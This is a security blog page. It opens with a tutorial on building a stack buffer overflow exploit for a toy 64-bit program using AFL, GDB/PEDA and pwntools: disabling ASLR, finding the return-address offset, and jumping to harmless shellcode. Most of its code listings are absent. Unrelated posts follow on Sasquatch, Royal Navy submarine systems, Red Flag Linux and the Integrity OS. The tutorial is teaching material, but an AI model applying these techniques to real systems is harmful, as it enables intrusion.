Exploit Development with AFL, PEDA and PwnTools



In a previous post, we studied how to fuzz a simple homemade 64-bit program using AFL. We found that we could cause a segmentation fault in the target using some specific inputs. In this post (and in this video), we will cover the next step: confirming if the crash can lead to a vulnerability. To do so, we’ll use GDB, the GNU debugger, and PEDA to analyze the execution of the target while processing the inputs previously generated by AFL. By doing so, we will find a way to hijack the execution flow from the Vuln1 program in order to execute our own code.

Analyzing and Exploiting Vuln1

The hard part is now about to start, as we need to delve into to assembly code of the target, analyze the values of the registers and understand how they are related to the input. Fortunately, this step is greatly eased with the introduction of tools such as peda and pwntools. Let’s install these right now. To install gdb-peda, simply run this shell script provided by the developers:

Then install pwntools using pip with  sudo -H pip install pwntools . Once done, we are set to start analyzing the crash.

PEDA will automatically load whenever you start GDB. Before we start, it’s essential to understand some details about GDB, namely that it uses environment variables and hooks within the code of the debugged program. Why is this important? Exploits can heavily depend on knowing some specific memory addresses within the program itself. These locations within the code will vary depending on the defined environment variables and any additional instruction added by GDB. You must be aware that many Linux distributions are enabling Address space layout randomization (ASLR) by default. ASLR will defeat the exploit developed in this tutorial and must be disabled by editing the  /proc/sys/kernel/randomize_va_space file. This file can contain one of the following values:

  • 0 – No randomization;
  • 1 – Conservative randomization. Shared libraries, stack, mmap(), VDSO and heap are randomized; and
  • 2 – Full randomization. In addition to elements listed in the previous point, memory managed through brk() is also randomized.

For the purposes of this exercise, set the value contained in this file to  . You can see the impact of disabling ASLR has on our experiment in this companion video of this post.

That being said, let’s start gdb with the vuln1 program by typing gdb ./vuln1  at the shell. Doing so will load the vuln1 program within the debugging process, but will not execute it until you execute the  run  command, or r  for short. Once you do so, you will see that you are prompted to enter the username and password just as when you are executing the program from the shell. If you type in regular strings, the program will execute as expected and terminate. Quite uneventful. Let’s try something more interesting: execute the program with the inputs generated by AFL. Assuming you have the inputs in a file called crash1.txt, type r < crash1.txt  to start the program using the AFL inputs. This time, you’ll notice that the execution ends with a Segmentation Fault (SIGSEGV) and quite a few things are displayed in your terminal.

Figure 1: Running the vuln1 program in GDB with the fuzzed input generated by AFL.

Let’s take a closer look to the information on the screen. When the fault was caught by the debugger, it stopped the execution of vuln1. At that point, PEDA captured the current state of the application, including values of the registers, the program stack and the instruction which resulted in the fault. In this case, after reviewing the data, you should notice the value pointed by the RSP register.

Figure 2: Value of the RSP register when vuln1 is ran with AFL-generated inputs.

If we take a closer look into our input using the hexdump C crash1.txt  command. We’ll notice a familiar pattern:

Notice the various a7 61b4 6161 6161 a761 values. Well it seems that these bytes somehow ended up being pointed by the RSP register. There’s an easy way to confirm this using PEDA using its pattern generator, but first we need to know how long our input is:

The  wc command tells us that there is 114 bytes in the crash1.txt file, so let’s round this up to 120 bytes for simplicity. Going back to GDB, will use PEDA to generate a cyclic pattern of 120 characters as input using the following command:

This will create a file named pat120 with the generated cyclic pattern. If you take a quick look at it, you’ll have an idea of how it looks. For those who used Metasploit before, this functionality is similar to the pattern_create.rb script.

Now let’s run vuln1 using this newly generated input:

Once again, a segmentation fault is thrown by vuln1 and caught by GDB, however this time the values on the stack are different. The value being pointed to by RSP is also different. Looking back at our pattern, we clearly see that our input is overwriting whatever value is pointed by the RSP register.

The Cyclic Pattern is Pointed by RSP
Figure 3: The RSP register is pointing to the cyclic pattern generated at address 0x7fffffffdec8.

Why is this important? Well because the value pointed by this register will eventually be used as a return address once we hit the RET instruction at main+149. Therefore we can put a specific address in RSP and redirect execution flow to a location we control in memory and execute our own code. First thing we need to figure out is: which bytes of our input are being pointed by RSP? Again, PEDA provides an easy way to do so using the pattern_search  command. This function will provide you with information about where the pattern is detected in memory and in the registers:

In the output above, the value pointed by RSP is overwritten after reading 40 bytes of the given input. Which means that any 8-byte combination (32 bits) located at position 40 will end up being pointed to by the RSP register and eventually, loaded into RIP and used as the address of the next instruction to execute once we reach the RET instruction. Let’s test this by creating a really simple payload that will fill the RSP with “B”s. We do so by generating 40 “A”, then 8 “B” and 112 “C”s. We can use the printf command from the Bash shell, or you can also do the same in Python or Perl. We will use Bash here:

Restart vuln1 by providing input2 as input and take a look at the value of the RIP register:

Failed Hijack of the RSP register
Figure 4: The RIP register didn’t take the address stored in RSP.

Something didn’t go the way we expected. We should have RSP pointing to 0x4242424242424242 (‘BBBBBBBB’), but that’s not the case and the reason for this is that we’re trying to fill RIP with an invalid 64-bit address, which causes a segmentation fault. Despite being able to address 64 bits, current processors actually only support 48 bits, so the upper two bytes should always be null, i.e. 00 00. Knowing this, we’ll modify slightly our payload to include 6x “B” rather than 8.

Note that we are in little endian and therefore, we will write the 2 null bytes AFTER the 6 “B”s. And if we try again, we should be more successful:

We still get a segmentation fault, but this time, it’s because we are trying to reach an invalid address. We now proven that we can take control of the RIP register and redirect execution flow. We also know that we can put our own code within the input given to the vuln1 application, and it will be stored on the stack, which we made executable for the purpose of this exercise. The next step is to actually develop our exploit.

Crafting the Shellcode

Now that we have demonstrated the vulnerability, we need to decide what kind of payload we want. We’ll also determine where our shellcode is stored and then test our payload. This is the trickiest part of software exploitation as many variables comes into play. The addresses obtained in this post will differ from system system and yours will likely be different as well. 

To generate our payload, we will use pwntools, a Python module extremely efficient  at prototyping workable exploits. You will often find it used by participants of CTF. First install the Pwntools module using  pip install pwn . Afterwards, open a Python interpreter such as ipython and import the Pwn-tools module with from pwn import * .

We’ll use the shellcraft sub-module, which offers a wide selection of payloads for multiple architectures. To output the shellcode, simply select the appropriate function from the shellcraft module. for the target architecture and operating system, i.e. ‘amd64’ and ‘linux’. You can obtain more information by using help(shellcraft) in a Python interpreter. You can also combine multiple payloads. Prior to using any of the shellcode, make sure to specify the architect by setting the context object adequately:

For the purpose of this post, we’ll use a lame shellcode that will simply output “Hello!” and exit cleanly. In future posts, we’ll have more useful payloads. We’ll structure our payload as follow:

Basic Exploit Structure for Vuln1
Figure 5: Basic payload structure for the Vuln1 exploit.

The first 40 bytes are simply used to fill the initial buffers and variables to reach the value pointed by RSP. While we used ‘NOP‘ instructions, any value could be used. Bytes 40 to 48 will store the address to our shellcode, which follows it immediately. Our shellcode will occupy the last 112 bytes if it fits that space:

Since our payload is 44 bytes – less than 112 bytes – it will easily fit in the space we have after the address, i.e in the “C” segment of the payload. Had it been greater than 112 bytes, we would have to split it. But let’s stick to the basics for now.

Jump Around

Next, we have to determine the address of our shellcode, i.e. where is our shellcode is located on the stack? Looking back at figure 4,  our place holder of the address (i.e. “BBBBBB”) is at 0x7fffffffdec8. The length of the address is 8 bytes and thus our shellcode will start at 0x7fffffffdec8+8:

Detailed structure of the Vuln1 payload.
Figure 6: Detailed structure of the Vuln1 payload.

Notice that we added a NOP sled after the address. Although not strictly needed, doing so will gives us some leeway for error, especially when testing our payload outside GDB as you will see later. Now let’s craft a quick python function to create our payload and store it into a file. This will automate testing and make things much faster.

Let’s explain some of the code above:

    • start_addr :  contains the address to jump to;
    • nop = asm('nop', arch="amd64") returns the opcode for the “NOP” instruction for amd64 architectures.
    • nop1 = nop*40 : Creates 40 NOPs instructions at the beginning of our payload. 
    • This line, struct.pack("<Q", addr)  will store the address of our shellcode on our payload in little-endian format. The Q is used to specify to the pack function that we are storing the address as a  unsigned long long . See the related Python docs for more information about using  struct

Start GDB again, make sure you have a breakpoint at the RET instruction, so we can follow the execution of our shell code. If you look back at previous runs, you’ll notice that our RET instruction is located at main+149.  To put a breakpoint to this address, simply type b* main+149  in GDB. This will cause the execution to pause at this address. Once paused, type  nexti and you’ll notice that we are jumping into our short NOP sled.

If you’d like to see the assembly translation of opcodes at a specific address, use the pdisass . For example, use  pdisass 0x7fffffffded0 and you should see the instructions listed below.

You can move forward faster thru each of the instructions by using  nexti <count> or just type continue or c to continue execution.  If everything goes well, the program will output “Hello!” and exit without any error:

Working Exploit in Vuln1 (GDB)
Figure 6: Our exploit correctly prints “Hello!” and exits without error.

We now have a working exploit in GDB…admittedly not a terribly useful one. However if you try to launch this shellcode directly from the command-line, you’ll notice that you will get a Segmentation Fault warning:

As mentioned at the beginning, This is due to GDB adding environment variables on the stack when loading the Vuln1 program. You compare the environment variables between your shell and GDB by typing  env at the shell and using   show env at the GDB prompt. You’ll notice that GDB adds the “LINES” and “COLUMNS” variables. Also notice that different systems will have different variables defined, adding to the instability of our exploit. To prevent environment variables from interfering with our exploit, we will unset all of them in GDB by using the unset env command. When running our target from the shell, we will prefix it with  env - to unset all variables in the shell. For example:

To make our exploit work in the shell, we will need to adjust our jumping address. If we rerun our target with a new cyclic pattern without the environment variables, we obtain a different address:

In our first attempt with the environment variables, RSP contained the address 0x7fffffffdec8, this time RSP has 0x7fffffffed18 as value. Adjust this value in the script provided above and try again.

Despite our best efforts, we still can’t exploit from the shell, but we are getting closer. At this point, there is no trick to getting it right but only trial and error. GDB may be adding extra instructions in the code for debugging purposes and still making our jump invalid. There are 2 variables you can adjust to guess to fix the issue:

  1. Gradually increase the jump address; and
  2. Increase the size of the NOP sled preceding the shellcode.

In my case, the exploit finally worked by increasing the jump address by 140 bytes and increasing the NOP sled to 80 bytes. Below is the update Python script used. Note that these values will be different based on your system:


Crafting exploit is a mixture of technology and art. While there is a process and a methodology to go about it, there’s always something different that will require additional research, experimenting and tweaking. Even then, your exploit is not guaranteed 100%, given the multiple variables that can affect offsets or memory locations. Practice and experience will take care of honing these skills. This post is a very timid first step and has many failings: we removed common memory protections, we have include quite a useless exploit and we need to remove environment variables for it to work outside of GDB. We’ll gradually improve the realism of this exercise. However we now understand the overall exploit development process better, along with the various difficulties involved.

YouTube Video


Zalewski, M. American Fuzzy Lop. Retrieved June 24, 2017, from http://lcamtuf.coredump.cx/afl/

Salzman, P. %. (n.d.). Using GNU’s GDB Debugger. Retrieved June 24, 2017, from http://www.dirac.org/linux/gdb/

PEDA – Python Exploit Development Assistance for GDB. Retrieved June 24, 2017, from https://github.com/longld/peda


64-bit Linux stack smashing tutorial: Part 1. Retrieved June 24, 2017, from https://blog.techorganic.com/2015/04/10/64-bit-linux-stack-smashing-tutorial-part-1/

Mr.Un1k0d3r. 64 Bits Linux Stack Based Buffer Overflow. Retrieved June 24, 2017, from https://www.exploit-db.com/docs/33698.pdf

Bravon, A. “How Effective is ASLR on Linux Systems?” Security et alii. February 03, 2013. Accessed July 12, 2017. https://securityetalii.es/2013/02/03/how-effective-is-aslr-on-linux-systems/.

Retrieved June 24, 2017, from http://www.mathyvanhoef.com/2012/11/common-pitfalls-when-writing-exploits.html

Additional Reading

Klein, Tobias. A bug hunter’s diary: a guided tour through the wilds of software security. No Starch Press, 2011. http://amzn.to/2h7imkp

Koziol, Jack, David Litchfield, Dave Aitel, Chris Anley, Sinan Eren, Neel Mehta, and Riley Hassell. “The Shellcoder’s Handbook.” Edycja polska. Helion, Gliwice (2004). http://amzn.to/2h7iArF

Dowd, Mark, John McDonald, and Justin Schuh. The art of software security assessment: Identifying and preventing software vulnerabilities. Pearson Education, 2006. http://amzn.to/2vNZBG2

Sasquatch for Ubuntu


I am an avid user of binwalk since it automates the initial reverse engineering work. It identifies the compression, if any, and file format of a given firmware fairly easily once you take care of the false positives.

Last week I built a virtual machine (VM) using a minimal install of Xubuntu Linux. My last Debian-based VM had become bloated and slow, so it was time to clean up. Surprisingly, I couldn’t get Sasquatch to compile for Ubuntu. Sasquatch is a helper tool for non-standard Squash file systems,  rampant in the Internet-of-Things (IoT) realm. It seems the patches made for squashfs 4.3 just won’t compile under Ubuntu Linux, likely due to the liblzma library included in the operating system.

Trying to fix the patches soon led to endless sequence of additional compiling errors, so I took the easy way out: compiled Sasquatch on Debian and just used the binary in by Xubuntu VM. It worked!

Anyone in the same situation can download the pre-compiled Sasquatch binary here. Happy reverse engineering!

Submarine Command System


A press release from BAE Systems announced the installation of the Submarine Command System Next Generation (SMCS NG) on twelve nuclear submarines of the Royal Navy, effectively ending the conversion of the seven Trafalgar-class submarines, four Vanguard-class submarines and one Swiftsure class[1].

The new command system is based on COTS hardware and software products. It uses mainstream PCs and Windows as supporting components. All computers are connected with on a LAN by an Ethernet network using fiber-optic cable. According to The Register, the system will mostly be based on Windows XP[2] although in was initially decided it would be based on Windows 2000.

The role of this system is to store and compile data from various sensors in order to present tactical information for the leadership. It also controls the weaponry:

SMCS NG is designed to handle the growing volume of information available in modern nuclear submarines and to control the sophisticated underwater weapons carried now and in the future. Its core capability is the assimilation of sensor data and the compilation and display of a real time tactical picture to the Submarine Command Team[3].

The SMCS NG system is the descendant of the previous SMCS system that was proposed back in 1983, when the U.K decided to build a new command system for the then-new Trident class. Before, all electronics were custom built by Ferranti. The SMCS would use COTS material to minimize the costs and become fewer dependants on one company. The architecture of the command system was modular and was written in Ada 83. The core of the system contains an Input/Output computer node, a computer that process data from the sensors and weapons systems. There is also the central node, which is used for processing all the data. Each of the central nodes are duplicated to provide of fault-tolerance, with each being dual modular tolerant, which means that hardware components are working in parallel in case one becomes defective. The dual central nodes are connected to each other and they are also connected to Multi Function Consoles, a Main Tactical Display and two Remote Terminals, which provide the Human Computer Interface. The first phase of the project was to install the SMCS on the Vanguard class submarines.

In 1990, it was decided to extend the SMCS to other submarine classes and that the new command system would use UNIX as its base operating system. Because of the Ada architecture, problems arose when the technicians tried to map the SMCS to run-time processes of UNIX. Solaris and SPARC machines were finally selected for Multi Function Consoles. The central nodes kept their original architecture in Ada.

SMCS Multi Function Monitor in a Vanguard Class Submarine
SMCS Multi Function Monitor in a Vanguard Class Submarine

In 2000, the project was completely own by BAE Systems and the move from SPARC computers to PCs. The switch for the operating system was more difficult, as management preferred Windows while the engineers promoted the use of variants of UNIX such as BSD, Linux or Solaris. The main argument for the engineers was that with UNIX, it would be possible to remove all the extra code unneeded for the submarines operations, thus making it more secure. However, the management point of view prevailed and thus was created the “Windows for Warships” label.

Windows was chosen even after the USS Yorktown accident in 1997, in the US. The ship was crippled after the sysadmin entered invalid data into the database thought the Remote Database Manager.[4]

Insert any jokes about Windows controlling nuclear subs into the comments. Thank you.

Clippy Launch Warning Blue Screen of Death

See also:

SMCS“, AllExperts, http://en.allexperts.com/e/s/sm/smcs.htm (accessed on December 17, 2008)

Submarine Command System (SMCS)“, Ultra Electronics, http://www.ultra-ccs.com/systems/smcs/ (accessed on December 17, 2008)

Operating Systems Contracts, Trusted Software?“, Richard Smedly, Linux Format, March 2005, http://www.linuxformat.co.uk/pdfs/LXF64.pro_war.pdf (accessed on December 17, 2008)

Development Drivers in Modern Multi-function Consoles and Cabinets“, Armed Forces International, http://www.armedforces-int.com/categories/military-consoles-and-cabinets/development-drivers-in-modern-multifunction-consoles-and-cabinets.asp (accessed on December 17, 2008)

[1] “Royal Navy’s Submarine Command System Installation Programme Completes Ahead of Time”, BAE Systems, December 15, 2008, http://www.baesystems.com/Newsroom/NewsReleases/autoGen_108111514515.html (accessed on December 17, 2008)

[2] “Royal Navy completes Windows for SubmarinesTM rollout”, Lewis Page, The Register, December 16, 2008, http://www.theregister.co.uk/2008/12/16/windows_for_submarines_rollout/ (accessed on December 17, 2008)

[3] Ibid.

[4] “Operating Systems Contracts, Trusted Software? “, Richard Smedly, Linux Format, March 2005, p.72

China’s Red Flag Linux


Red Flag Linux Logo
Red Flag Linux Logo

Two days ago, the Inquirer post an article on a new law passed in the Chinese city of Nanchang, in the Jiangxi province, to replace pirated copies of Windows in Internet cafes by legitimate software[1]. The alternative proposed to the cafes is the Red Flag Linux distribution, which prompted fears of snooping by U.S Radio Free Asia. The radio quoted the director of the China Internet Project, Xiao Qiang as saying that “cafes were being required to install Red Flag Linux even if they were using authorised copies of Windows[2]“. According to an official of the Nanchang Cultural Discipline Team, the transition from Windows to Red Flag already started in the 600 Internet Cafes of the city[3] and not across all of China unlike many titles claim.

Short History of Red Flag Linux

Red Flag Linux was created by the Software Research Institute of the Chinese Academy of Sciences in 1999 and was financed by a government firm: NewMargin Venture Capital. The distro is now distributed to government offices and business by Red Flag Software Co[4]. The goal of the Chinese government was to reduce the dominance of Microsoft over the operating system market. It therefore invested in Red Flag Software through a venture capital investment company owned by the Ministry of Information Industry called CCIDNET Investment[5].

At first, the OS was exclusively in Chinese and restricted itself to the Chinese market. In 2003, then the company developed an English version for international markets. This project received further help after Hewlett Packard concluded a plan to provide Red Flag with help in various field to market its operating system around the world[6]. As many companies took interest in the Chinese economic boom, Red Flag signed partnerships with various western companies like IBM, Intel, HP, Oracle[7] who wanted to open a new market into China. That way, Real networks among others, distributed its media software with Red Flag[8].

According to IDC, a market-research company, the revenue of Red Flag Software Co. totalled US$8.1 million in 2003. There were 24 000 server operating system shipments accounting for $5.9 million in revenue[9]. In 2006, Red Flag Software was the top Linux distributing company in China with over 80% of the Linux desktop market[10]. After a while, new versions of Red Flag were made for mobile devices[11] and embedded devices[12]. It can also be found on various server sold across China by Dell.

Therefore it seems that Red Flag Linux, after a slow period in the dot-com crash, is alive and well nowadays in China. The operating system changed quite a bit from its beginnings in 1999 up to now but we can expect the use of this distribution to grow in the upcoming years, as prices for proprietary OS such as Windows can be quite prohibitive for most of the Chinese population. The Red Flag Linux distro can be downloaded for free from Red Flag Software Co. (see the end of this article for the links) while Vista Home Basic was sold at renminbi (US$65.80) in 2007[13]

Technical Aspects

According to this early reviewer who tested the OS back in 2002[14], the first Red Flag 2.4 Linux OS was based on the Red Hat distro. It came basically with the same options such as X11, the KDE interface as default and used the Reiser file system. Interestingly, no root password were needed and seemed to be the default account. It came with the standard user applications such as XMMS.

Since then, Red Flag Linux has switch from Red Hat to Asianux 2.0 as its base distribution[15]. A root password needs to be specified at the installation and is now available on Live CD. Also, don’t expect a completely English system, while the most important parts of it should be English, some may still be in Mandarin. XMMS has long been replaced with KDE’s multimedia tools such as KsCD, JuK, Dragon Player, and KMix. Other software you can find on the “Olympic” beta version distribution, released last September[16]:

KAddressBook Kopete
Kontact Krfb
KOrganizer KNode
Firefox Akregator
KMail Akonadi

According to the reviewer, and by looking at the English website, is does look like the English version is not maintained as much as the Chinese version. Therefore I believe the Chinese version might contain more features and less bugs. It might even contain office software such as Red Office.

This operating system is certainly one to watch, not really for its technical aspects or usefulness, but mainly because it might spread across China as businesses and governmental agencies adopt Red Flag Linux. If an attack should be ported against Chinese communication infrastructure, this distribution would certainly be one of the targets to analyze in order to find holes and exploits. Unfortunately, finding information about this Linux is tricky, mainly due to the language barrier. Using software translation is amusing but useless. It is hard to determine if the OS contains any modification for spying or snooping, as one would need to go through the source of a large part of the OS (I wish I had time to do that). But then, it’s less hard than to examine closed source software. Snooping can come from everywhere also, they might be better off with Red Flag Linux than Sony software afterall[17]

If anyone has information, please share it, as information should always be shared. In the meantime, a desktop version of Red Flag Linux is available here. And if you can understand Mandarin, maybe you could visit this page.

Enrich your Mandarin Vocabulary: 红旗 = Red Flag

See also:

Red Flag Software Co., http://www.redflag-linux.com/ (Mandarin language)

Red Flag Software Co., http://www.redflag-linux.com/eindex.html (English language)

Red Flag Linux may be next on IBM’s agenda“, James Niccolai, Network World, September 22, 2006, http://www.networkworld.com/news/2006/092206-red-flag-linux-may-be.html (accessed on December 4, 2008)

Dell flies Red Flag Linux in China“, Michael Kanellos, ZDNet, December 3, 2004, http://news.zdnet.com/2100-3513_22-133162.html (accessed on December 4, 2008)

With HP’s help, China’s Red Flag Linux to step onto global stage“, Sumner Lemon, ComputerWorld, September 2, 2003, http://www.computerworld.com/softwaretopics/os/linux/story/0,10801,84602,00.html (accessed on December 5, 2008)

Add to FacebookAdd to NewsvineAdd to DiggAdd to Del.icio.usAdd to StumbleuponAdd to RedditAdd to BlinklistAdd to Ma.gnoliaAdd to TechnoratiAdd to Furl

[1] “Chinese ordered to stop using pirate software”, Emma Hughes, The Inquirer, December 3, 2008, http://www.theinquirer.net/gb/inquirer/news/2008/12/03/chinese-ordered-away-pirate (accessed on December 4, 2008)

[2] “New fears over cyber-snooping in China”, Associated Press, The Guardian, December 4, 2008, http://www.guardian.co.uk/world/2008/dec/04/china-privacy-cyber-snooping (accessed on December 4, 2008)

[3] “Chinese Authorities Enforce Switch from Microsoft”, Ding Xiao, translated by Chen Ping, Radio Free Asia Mandarin Service, December 2, 2008, http://www.rfa.org/english/news/china/microsoft%20to%20linux-12022008144416.html (accessed on December 4, 2008)

[4] Ibid.

[5] “Raising the Red Flag”, Doc Searls, Linux Journal, January 30, 2002, http://www.linuxjournal.com/article/5784 (accessed on December 4, 2008)

[6] “English version of China’s Red Flag Linux due soon”, Sumner Lemon, InfoWorld, September 8, 2003, http://www.infoworld.com/article/03/09/08/HNenglishredflag_1.html (accessed on December 4, 2008)

[7] “Red Flag Linux”, Operating System Documentation Project, January 13, 2008, http://www.operating-system.org/betriebssystem/_english/bs-redflag.htm (accessed on December 4, 2008)

[8] “RealNetworks signs up Red Flag Linux”, Stephen Shankland, CNet News, October 6, 2004, http://news.cnet.com/RealNetworks-signs-up-Red-Flag-Linux/2110-7344_3-5399530.html (accessed on December 4, 2008)

[9] “China’s Red Flag Linux to focus on enterprise”, Amy Bennett, IT World, August 16, 2004, http://www.itworld.com/040816chinaredflag (accessed on December 4, 2008)

[10] “Red Flag Linux 7.0 Preview (Olympic Edition)”, Begin Linux Blog, August 15, 2008, http://beginlinux.wordpress.com/2008/08/15/red-flag-linux-70-preview/ (accessed on December 4, 2008)

[11] “Introduction to MIDINUX”, Red Flag Software, June 2007, http://www.redflag-linux.com/chanpin/midinux/midinux_intro.pdf (accessed on December 4, 2008)

[12] “Car computer runs Red Flag Linux”, LinuxDevices, November 13, 2007, http://www.linuxdevices.com/news/NS4055537183.html (accessed on December 4, 2008)

[13] “Update: Microsoft cuts Windows Vista price in China”, Sumner Lemon, InfoWorld, August 3, 2007, http://www.infoworld.com/article/07/08/03/Microsoft-cuts-Vista-price-in-China_1.html (accessed on December 5, 2008)

[14] “Red Flag, China’s home-grown Linux distribution, is a good start”, Matt Michie, Linux.com, February 22, 2002, http://www.linux.com/articles/21365 (accessed on December 4, 2008)

[15] “Red Flag Linux Desktop”, http://www.iterating.com/products/Red-Flag-Linux-Desktop/review/Janos/2007-07-01 (accessed on December 5, 2008)

[16] “Red Flag Linux Olympic Edition fails to medal”, Preston St. Pierre, Linux.com, September 11, 2008, http://www.linux.com/feature/146867 (accessed on December 5, 2008)

[17] “Real Story of the Rogue Rootkit”, Bruce Schneier, Wired, November 17, 2005, http://www.wired.com/politics/security/commentary/securitymatters/2005/11/69601 (accessed on December 5, 2008)

Integrity OS to be Released Commercially


The Integrity Operating System, an OS with the highest security rating from the National Security Agency (NSA) and used by the military, will now be sold to the private sector by Integrity Global Security, a subsidiary of Green Hills Software. The commercial operating system will be based on the Integrity 178-B OS, which was used in the 1997 B1B Bomber and afterwards in F-16, F-22 and F-35 military jets. It is also used in the Airbus 380 and Boeing 787 airplanes[1].

The Integrity 178-B OS has been certified EAL6+ (Evaluation Assurance Level 6) by the NSA and is the only OS to have achieve this level of security for now. Most commercial operating systems such as Windows and Linux distributions have an EAL4+ certification. The EAL is a certification which indicates a degree of security of the operation system, level 1 is about applications having been tested but where a security breach would not incurs serious threats. A level 7, the highest level, contains applications strong enough to resist a high risk of threats and can withstand sophisticated attacks. Only one application has a level 7 certification and it is the Tenix Data Diode by Tenix America[2].

The Integrity OS can run by itself or with other operating systems on top, such as Windows, Linux, MacOS, Solaris, VxWorks, Palm OS and even Symbian OS. Each OS being in is own partition to limit the eventual failures and security vulnerabilities to the OS only.



Protection Profile

Security Level


Operating System


EAL 6+


Operating System


EAL 4+

PR/SM LPAR Hypervisor





Operating System

Not evaluated

EAL 4+

Solaris (and Trusted Solaris)

Operating System


EAL 4+


Operating System






EAL 4+

Windows Vista

Operating System

Not evaluated

EAL 4+

Windows XP

Operating System


EAL 4+



Not evaluated

EAL 4+

Main Operating Systems with the type of protection profile used and the assigned EAL[3]

The main feature of the Integrity OS is the use of the Separation Kernel Protection Profile (SKPP). A protection profile (PP) is a document used by the certification process, which describes the security requirements for a particular problem. The SKPP is a standard developed by the NSA and in which the requirements for a high robustness operating system are defined and are based on John Rushby‘s concept of Separation Kernel. This concept can be summarized as:

… a single-processor model of a distributed system in which all user processes are separated in time and space from each other. In a distributed system, the execution of each process takes place in a manner independent of any other[4]

Basically, the concept is about a computer simulating a distributed environment, and each process is independent from the other, thus preventing that a corrupted or breached application gives inavertedly access to restricted resources, as it is often the case in privilege escalation in other commercial OS.

Schema of the Integrity 178B Operating System
Schema of the Integrity 178B Operating System

What makes SKPP standard so secure is that it requires a formal method of verification during the development. Furthermore, the source code is examined by a third party, in this case, the NSA.

SKPP separation mechanisms, when integrated within a high assurance security architecture, are appropriate to support critical security policies for the Department of Defense (DoD), Intelligence Community, the Department of Homeland Security, Federal Aviation Administration, and industrial sectors such as finance and manufacturing.[5]

Of course, the OS might be conceived for security and toughness, but in the end, it all depends on how it is used and configured…That’s going to be the real test. As far as I believe the people who verified the OS are competent, and all the expensive tests the company has paid to check their operating system are rigorous, the real exam would be to release it in the wild so that hackers from all around the world can have a try at it. Hopefully, we might be able to play with this OS someday…

See also:

U.S. Government Protection Profile for Separation Kernels in Environments Requiring High Robustness“, Information Assurance Directorate, June 29, 2007

Formal Refinement for Operating System Kernels, Chapter 4 p. 203-209“, Iain D. Craig, Springer London, Springer Link, July 2007

Separation kernel for a secure real-time operating system“, Rance J. DeLong, Safety Critical Embedded Systems, February 2008, p.22

Controlled Access Protection Profile“, Information Systems Security Organization, National Security Agency, October 8, 1999

[1] “Secure OS Gets Highest NSA Rating, Goes Commercial”, Kelly Jackson Higgins, DarkReading, November 18, 2008, http://www.darkreading.com/security/app-security/showArticle.jhtml?articleID=212100421 (accessed on November 19, 2008)

[2] “TENIX Interactive Lin k solutions”, TENIX America, http://www.tenixamerica.com/images/white_papers/datasheet_summary.pdf (accessed on November 19, 2008)

[3] “The Gold Standard for Operating System Security: SKPP”, David Kleidermacher, Integrity Global Security, 2008, http://www.integrityglobalsecurity.com/downloads/SKPPGoldenStandardWhitePaper.pdf (accessed on November 19, 2008)

[4] “Formal Refinement for Operating System Kernels”, Iain D. Craig, Springer London, Springer Link, July 2007, p. 203

[5] “U.S. Government Protection Profile for Separation Kernels in Environments Requiring High Robustness”, Information Assurance Directorate, June 29, 2007, p.10